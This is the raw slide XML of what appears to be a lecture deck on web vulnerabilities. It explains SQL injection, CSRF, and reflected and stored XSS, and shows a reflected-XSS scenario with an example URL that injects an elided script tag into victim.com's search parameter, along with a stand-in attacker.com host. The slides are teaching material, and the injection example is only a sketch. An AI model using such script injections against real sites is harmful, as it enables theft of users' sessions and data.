            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15364" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="304800"/>
            <a:ext cx="8382000" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15365" name="Picture 18" descr="toshiba_satellite_a105_s4284_laptop"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="1600200"/>
            <a:ext cx="1436688" cy="1436688"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15366" name="Picture 11" descr="CompaqAlphaServerES40"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7170738" y="4446588"/>
            <a:ext cx="1155700" cy="1420812"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15367" name="Picture 4" descr="DS15serverfront"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5564188" y="609600"/>
            <a:ext cx="2436812" cy="846138"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15368" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5943600" y="2286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15369" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6773863" y="4019550"/>
            <a:ext cx="1760537"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Victim Server </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15370" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2046288" y="1069975"/>
            <a:ext cx="3211512" cy="687388"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd type="arrow" w="med" len="med"/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15371" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="2971800"/>
            <a:ext cx="15573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Victim client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15372" name="TextBox 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="2392363" y="982663"/>
            <a:ext cx="2192337" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user gets bad link</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15373" name="Straight Arrow Connector 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="2743200"/>
            <a:ext cx="4572000" cy="1447800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15374" name="TextBox 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1101636">
            <a:off x="3044825" y="2986088"/>
            <a:ext cx="2570163" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user clicks on link</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15375" name="TextBox 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="3300413" y="3665538"/>
            <a:ext cx="3000375" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>victim echoes user input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15376" name="Straight Arrow Connector 34"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="3105150"/>
            <a:ext cx="5021263" cy="1619250"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="arrow" w="med" len="med"/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3276600" y="1944688"/>
            <a:ext cx="4457700" cy="646112"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg2">
                <a:lumMod val="25000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://victim.com/search.php ? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> term = &lt;script&gt; ... &lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4362450"/>
            <a:ext cx="5334000" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="50000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>www.victim.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3276600" y="1639888"/>
            <a:ext cx="4457700" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>www.attacker.com</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533400" y="1524000"/>
            <a:ext cx="114300" cy="2133600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="12700" algn="ctr">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11267" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" smtClean="0"/>
              <a:t>Three top web site vulnerabilites</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11268" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Browser sends malicious input to server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bad input checking leads to malicious SQL query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CSRF – Cross-site request forgery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bad web site sends request to good web site, using credentials of an innocent victim who “visits” site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XSS – Cross-site scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bad web site sends innocent victim a script that steals information from an honest web site</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="4648200"/>
            <a:ext cx="3962400" cy="708025"/>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Inject malicious script into trusted context</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="3330575"/>
            <a:ext cx="3962400" cy="708025"/>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Leverage user’s session at </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>victim sever</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="2035175"/>
            <a:ext cx="3962400" cy="708025"/>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Uses SQL to change meaning of database command</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smtClean="0"/>
              <a:t>What is XSS?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16387" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>An XSS vulnerability is present when an attacker can inject scripting code into pages generated by a web application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Methods for injecting malicious code:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Reflected XSS (“type 1”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>the attack script is reflected back to the user as part of a page from the victim site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Stored XSS (“type 2”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>the attacker stores the malicious code in a resource managed by the web application, such as a database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Others, such as DOM-based attacks</a:t>
            </a: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a:xfrm>
            <a:off x="457200" y="304800"/>
            <a:ext cx="8382000" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Basic scenario: reflected XSS attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17411" name="Picture 18" descr="toshiba_satellite_a105_s4284_laptop"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="2601913"/>
            <a:ext cx="1436688" cy="1436687"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17412" name="Picture 11" descr="CompaqAlphaServerES40"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5959475" y="4979988"/>
            <a:ext cx="1155700" cy="1420812"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17413" name="Picture 4" descr="DS15serverfront"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5564188" y="1905000"/>
            <a:ext cx="2436812" cy="846138"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17414" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5943600" y="15240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17415" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5562600" y="4552950"/>
            <a:ext cx="17605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17416" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2046288" y="1920875"/>
            <a:ext cx="3211512" cy="687388"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17417" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="3886200"/>
            <a:ext cx="14652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sp>
        <p:nvSpPr>
          <p:cNvPr id="4107" name="TextBox 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="2954338" y="1663700"/>
            <a:ext cx="2209800" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Collect email </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>addr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4109" name="TextBox 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-743562">
            <a:off x="2616200" y="2270125"/>
            <a:ext cx="2522538" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>send malicious email</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17420"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17421" name="TextBox 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="3049588" y="4070350"/>
            <a:ext cx="1654175" cy="400050"/>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17422" name="TextBox 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="2319338" y="4521200"/>
